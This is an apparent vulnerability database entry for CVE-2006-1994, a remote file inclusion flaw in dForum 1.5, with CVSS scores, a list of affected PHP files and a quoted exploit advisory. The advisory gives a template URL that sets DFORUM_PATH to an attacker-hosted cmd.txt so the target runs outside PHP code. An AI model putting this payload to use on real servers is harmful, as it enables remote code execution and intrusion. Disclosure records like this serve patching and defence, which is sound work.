CVE-2006-1994

Published: 25/04/2006 Updated: 20/07/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

PHP remote file inclusion vulnerability in dForum 1.5 and previous versions allows remote malicious users to execute arbitrary PHP code via a URL in the DFORUM_PATH parameter to (1) about.php, (2) admin.php, (3) anmelden.php, (4) closethread.php, (5) config.php, (6) delpost.php, (7) delthread.php, (8) dfcode.php, (9) download.php, (10) editanoc.php, (11) forum.php, (12) login.php, (13) makethread.php, (14) menu.php, (15) newthread.php, (16) openthread.php, (17) overview.php, (18) post.php, (19) suchen.php, (20) user.php, (21) userconfig.php, (22) userinfo.php, and (23) verwalten.php.

Vulnerable Product

dforum dforum 1.5

Exploits

dForum <= 1.5 (DFORUM_PATH) Multiple Remote File Inclusion Vulnerabilities
Method found by nukedx
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploit works on dForum <= 1.5
[victim]/[dForumPath]/[filename]?DFORUM_PATH=yourhost.com/cmd.txt?
Files -> about.php admin.php anmelden.php closethre ...